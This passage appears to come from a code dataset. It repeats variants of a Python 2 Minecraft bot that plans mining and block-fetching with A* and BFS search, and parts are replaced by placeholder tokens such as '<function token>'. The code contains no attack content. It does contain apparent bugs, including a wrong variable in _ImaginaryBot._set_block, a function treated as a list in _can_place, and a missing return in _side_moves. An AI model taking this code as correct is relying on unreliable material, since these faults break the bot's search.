clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. 
If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the 
list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. 
If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the 
list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
 for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_ is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n 